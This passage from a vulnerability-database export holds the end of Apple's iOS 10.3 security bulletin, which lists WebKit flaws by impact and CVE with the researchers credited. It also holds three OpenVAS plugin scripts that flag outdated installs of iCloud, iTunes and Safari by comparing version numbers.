Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved 
memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. 
for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", 
"CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-17T14:20:34", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810983\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-2493\", \"CVE-2017-2480\", \"CVE-2017-2479\", \"CVE-2017-2463\",\n \"CVE-2017-5029\", \"CVE-2017-2383\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 14:51:38 +0530 (Tue, 16 May 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A validation issue existed in element handling.\n\n - Multiple memory corruption issues.\n\n - Poor certificate handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute 
arbitrary code, track a user's activity and exfiltrate\n data cross-origin.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207607\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:icVer, test_version:\"6.2\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T20:31:03", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-30T00:00:00", "type": "openvas", "title": "Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2013-7443", "CVE-2017-2383"], "modified": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310810724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810724", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810724\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2009-3270\", \"CVE-2009-3560\", \"CVE-2009-3720\", \"CVE-2012-1147\",\n \"CVE-2012-1148\", \"CVE-2012-6702\", \"CVE-2013-7443\", \"CVE-2015-1283\",\n \"CVE-2015-3414\", \"CVE-2015-3415\", \"CVE-2015-3416\", \"CVE-2015-3717\",\n \"CVE-2015-6607\", \"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-5300\",\n \"CVE-2016-6153\", \"CVE-2017-2383\", \"CVE-2017-2463\", \"CVE-2017-2479\",\n \"CVE-2017-2480\", \"CVE-2017-5029\");\n script_bugtraq_id(74228);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-30 17:37:29 +0530 (Thu, 30 
Mar 2017)\");\n script_name(\"Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A client certificate was sent in plaintext. This issue was addressed\n through improved certificate handling.\n\n - The multiple issues existed in SQLite.\n\n - The multiple issues existed in expat.\n\n - The multiple memory corruption issues were addressed through\n improved memory handling.\n\n - The processing maliciously crafted web content may lead to arbitrary\n code execution.\n\n - The processing maliciously crafted web content may exfiltrate data\n cross-origin.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, cause unexpected application termination\n and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.6 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.6.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207599\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, 
test_version:\"12.6\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.6\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207600", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310810727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810727", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207600\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810727\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2377\", \"CVE-2017-2378\", \"CVE-2017-2385\", \"CVE-2017-2386\",\n \"CVE-2017-2389\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\",\n \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2424\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\",\n \"CVE-2017-2447\", \"CVE-2017-2453\", \"CVE-2017-2454\", \"CVE-2017-2455\",\n \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2463\", \"CVE-2017-2464\",\n \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2479\", \"CVE-2017-2480\", \"CVE-2017-2481\", \"CVE-2017-7071\");\n script_bugtraq_id(94554, 94559, 95725, 97130, 97129, 97136, 97143, 97176, 97133,\n 100613);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 16:41:59 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207600\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is 
prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues,\n\n - A state management issue,\n\n - A spoofing and denial-of-service issue existed in the handling\n of HTTP authentication,\n\n - A spoofing issue existed in the handling of FaceTime prompts,\n\n - A keychain handling issue in keychain item management,\n\n - A prototype access issue in exception handling,\n\n - Multiple memory corruption issues in input validation,\n\n - Multiple memory corruption issues in memory handling,\n\n - A type confusion issue in memory handling,\n\n - An access issue existed in Content Security Policy,\n\n - An uncontrolled resource consumption issue in regex processing,\n\n - An information disclosure issue existed in the processing of OpenGL shaders,\n\n - A memory corruption issue in input validation,\n\n - Multiple validation issues existed in the handling of page loading,\n\n - A validation issue existed in the handling of page loading,\n\n - A logic issue existed in the handling of frame objects,\n\n - A logic issue existed in the handling of strict mode functions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose sensitive information and can also lead to arbitrary\n code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207600\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n 
script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"10.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}